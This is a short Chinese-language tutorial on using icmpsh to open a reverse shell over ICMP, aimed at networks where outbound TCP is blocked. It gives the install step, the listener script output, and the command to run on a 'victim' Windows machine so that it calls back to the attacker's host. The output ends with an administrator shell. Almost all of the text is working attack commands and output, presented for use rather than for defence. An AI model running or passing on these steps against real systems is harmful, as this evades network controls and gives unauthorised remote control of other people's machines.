程序：https://github.com/inquisb/icmpsh#usage
在一些访问控制做的比较严格的环境中，由内到外的TCP流量会被阻断掉，文章主要讨论icmp shell的使用
特点：
1）开源程序
2）基于CS架构
3）服务端程序跨平台，支持C、perl、python
4）客户端仅支持Windows
5）不需要管理员权限

服务端需要先安装python包

[root@server120 icmpsh-master]# pip install Impacket

[root@server120 icmpsh-master]#./run.sh

####################################################

ICMP Shell Automation Script for

https://github.com/inquisb/icmpsh

####################################################

-------------------------------------------------------------------

[?]Whatis the victims public IP address?

-------------------------------------------------------------------

192.168.192.122

[-]Run the following code on your victim system on the listender has started:

++++++++++++++++++++++++++++++++++++++++++++

icmpsh.exe -t 192.168.192.120-d 500-b 30-s 128

++++++++++++++++++++++++++++++++++++++++++++

[-]Local ICMP Replies are currently enabled, I will disable these temporarily now

[-]LaunchingListener...,waiting for a inbound connection..D:\>whoamiwhoamiwin-a94sbnf0i6b\administrator

 

客户端：
icmpsh.exe -t 192.168.192.120 -d 500 -b 30 -s 128